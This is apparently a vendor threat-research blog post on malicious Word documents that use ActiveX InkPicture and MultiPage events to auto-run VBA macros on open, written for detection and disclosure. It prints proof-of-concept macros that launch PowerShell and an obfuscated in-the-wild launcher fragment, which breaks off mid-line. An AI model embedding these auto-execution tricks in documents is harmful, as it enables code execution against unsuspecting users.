Avatar

In late August we began to detect malicious Microsoft Word documents that contained VisualBasic (VB) macro code and the code appeared to be triggering when the document was opened. However, the documents did not contain any of the standard events used to launch VB macro code when a document is opened, including Document_Open, or Auto_Open events. Upon closer examination, all the documents contained the ActiveX InkPicture control and the Painted event. The InkPicture Painted event is triggered upon document open, just like the Document_Open event. Using ActiveX controls like InkPicture and events associated with it, an attacker can create malicious documents that launch VB macro code when the document is opened without using the standard document open event triggers. Security solutions that examine documents and only look for the standard document open events are likely to miss documents that use ActiveX controls like InkPicture to launch code when the document first opened.

Other vendors made note of the use of InkPicture ActiveX controls to launch VB macro code when the document is opened [1] [2].

It was also immediately obvious that InkPicture events other than Painted, like Painting or MouseHover, could be used to launch VB macro code at document open. In addition, Microsoft Office ActiveX controls other than InkPicture could also be used to launch VB macro code at document open.

We created a number of proof-of-concept documents using other events associated with InkPicture to observe how these samples behaved in the Threat Grid sandbox.

For example, this proof-of-concept sample launches powershell.exe using the InkPicture Painting event when the document opens.

Dim Once As Boolean


Private Sub InkPicture1_painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub

blog1Figure 1: shows powershell.exe being launched using the InkPicture Painting event when document opens

This proof-of-concept sample launches powershell.exe using the InkPicture MouseHover event when the document opens, this event triggers when the mouse is on top of the InkPicture control, and triggers automatically if the the mouse starts over the document when it opens, or the user moves the mouse on top of the document while it is open.

Dim Once As Boolean

Private Sub InkPicture1_MouseHover()
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub

blogs2

Figure 2: powershell.exe is launched using the InkPicture MouseHover event when the document opens

We added detection for these proof-of-concept samples as well as the means to detect new variants using other ActiveX controls.

Other researchers noted that InkPicture events in addition to Painted, and ActiveX controls other than InkPicture could be used to launch VB macros when a document was opened [3].

We have now begun to detect in-the-wild samples using InkPicture events other than Painted. We have also begun to detect in-the-wild samples using ActiveX controls other than InkPicture to launch VB macro code when a document is opened.

For example, we detected a very small number of documents using the MouseEnter event that is triggered at document open if the mouse is over the document.

 

Private Sub InkPicture1_MouseEnter()

   Dim first As String

   Dim second As String

   Dim third As String

   Dim fourth As String

   Dim fifth As String

   Dim sixth As String

   Dim seventh As String

   Dim eighth As String

   Dim ninth As String

   Dim tenth As String

   Dim eleventh As String

   Dim twelfth As String

   Dim last As String
first = ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(99)
second = ChrW(32) & ChrW(80) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108)
third = ChrW(108) & ChrW(32) & ChrW(40) & ChrW(78) & ChrW(101) & ChrW(119) &

Over the weekend of October 15 and 16 we detected a large number of documents using the ActiveX control MultiPage to automatically launch VB macro code at document open. These documents contain the ActiveX MultiPage control and use the associated Layout event. The Microsoft documentation indicates the Layout event triggers when, “… a form, Frame, or Multipage changes size.” [4]

The malicious documents, and proof-of-concept documents we created, demonstrate the MultiPage control’s Layout event will trigger automatically when a document opens.

This is an example of a the Layout event from a malicious sample:

Public Sub Adbvy_Layout(ByVal hdpmymr As Long)

   If MdsMR Then Exit Sub
   MdsMR = True
   gHLPhAD
   End Sub
   Public Sub gHLPhAD()
   On Error GoTo vdvunp
   PAaPbaC
   tcqmPm BXGkJ
   Exit Sub
   vdvunp:
   End Sub

The ActiveX controls InkPicture and MultiPage are just 2 of many ActiveX controls supported by Microsoft Office. Many of these ActiveX controls have associated events that can be triggered if a document is simply opened and macros are enabled.

Microsoft Office does not enable untrusted macros by default, but based on the fact users can manually enable macros and the sheer volume of malicious documents with embedded VB macros we see, attackers are finding success using these kinds of documents. We expect to see attackers further expand the use of ActiveX controls and further evolve techniques to avoid detection.

Example malicious document SHAs:

21f6d96f923e03ab4bd9b4b03005749be5617b4ed12dd1894b63672b8ee05ba2
4dd97f3e6ab0b8220c944845bb6daac243ddcf800b4bab315c20ea9869dd976e
51ec277f9eba95e9b81885b17d914ed0ef31ceb93f95ea5cb7e6bcc6d5fc3efe
9b28b2266ccfb409153eeacefb76f3a17de486a51d19c56deeac92fbd2db947b
b7d0bf849efe2ecaa6a614c4a02c22d73ce73a2d3747076afe5833385ba92860
c35495bc7483a8a71a89dd8859ee16ad1c73e251b1995165a4963522dddf0e42

Be sure to tune in to our webinar next week, The Ransomware Threat: New Tactics and How to Fight Back, where experts Eric Hulse and Josh Reynolds of Cisco Research and Efficacy Team (RET) will discuss the ransomware threat and how to fight back. Register to attend here.

References

[1] https://joe4security.blogspot.com/2016/09/will-it-blend-this-is-question-new.html

[2] https://www.proofpoint.com/us/threat-insight/post/ursnif-banking-trojan-campaign-sandbox-evasion-techniques

[3] https://www.greyhathacker.net/?m=201609

[4] https://msdn.microsoft.com/en-us/library/office/gg264490.aspx

 



Authors

Ross Gibb

Reverse Engineer, AMP Threat Grid

Engineering